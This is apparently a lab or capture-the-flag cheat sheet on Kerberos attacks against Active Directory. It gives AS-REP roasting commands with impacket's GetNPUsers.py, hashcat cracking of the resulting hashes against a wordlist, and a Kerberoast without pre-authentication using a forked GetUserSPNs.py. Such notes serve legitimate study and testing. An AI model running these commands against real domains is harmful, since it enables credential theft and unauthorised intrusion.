# With userlist
sudo GetNPUsers.py iptracej.local/ -dc-ip -usersfile usernames.txt
# With a single username
GetNPUsers.py absolute.htb/d.klay -dc-ip -no-pass -format hashcat
hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt
Kerberoast w/o pre-authentication
If an attacker knows of an account for which pre-authentication isn't required (i.e. an ASREProastable account), as well as one (or multiple) service accounts to target, a Kerberoast attack can be attempted without having to control any Active Directory account (since pre-authentication won't be required).
# ThePorgs version should be used
# pipenv shell
# git clone https://github.com/ThePorgs/impacket
# cd impacket/
# pip3 install .
GetUserSPNs.py rebound.htb/ -no-preauth jjones -usersfile users.txt -target-domain rebound.htb -dc-ip $RHOST